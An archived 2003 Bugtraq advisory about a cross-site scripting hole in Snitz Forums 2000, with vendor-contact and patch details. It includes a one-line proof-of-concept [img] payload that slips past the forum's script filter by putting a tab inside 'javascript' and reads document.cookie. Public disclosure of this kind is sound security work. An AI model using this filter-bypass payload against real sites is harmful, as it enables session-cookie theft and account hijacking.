CrossSite Scripting @ Snitz Forums 2000

From: badwebmasters@online.de
Date: 04/17/03

Next message: Geoff Shively: "Re: IE 6.0 - trivial crash"

Previous message: Muhammad Faisal Rauf Danka: "Fwd: CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 17 Apr 2003 18:33:38 -0000
From: <badwebmasters@online.de>
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

Description:

The BadWord-(Script-)Filter can be tricked by adding the Tab-Char (0x09)
into the script command. This may lead to CrossSite-Scripting.

Exploit:

[img]jav asc ript:alert%28document.cookie%29[/img]

Vendor:

Has been contacted on 15. April.

Patch:

Available at http://int23.online.de/badwebmasters/txt/adv011.txt

greetZ bWM

  -----------------------------------------------------
   badWebMasters - online security vs. web underground
         http://int23.online.de/badwebmasters

Next message: Geoff Shively: "Re: IE 6.0 - trivial crash"

Previous message: Muhammad Faisal Rauf Danka: "Fwd: CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]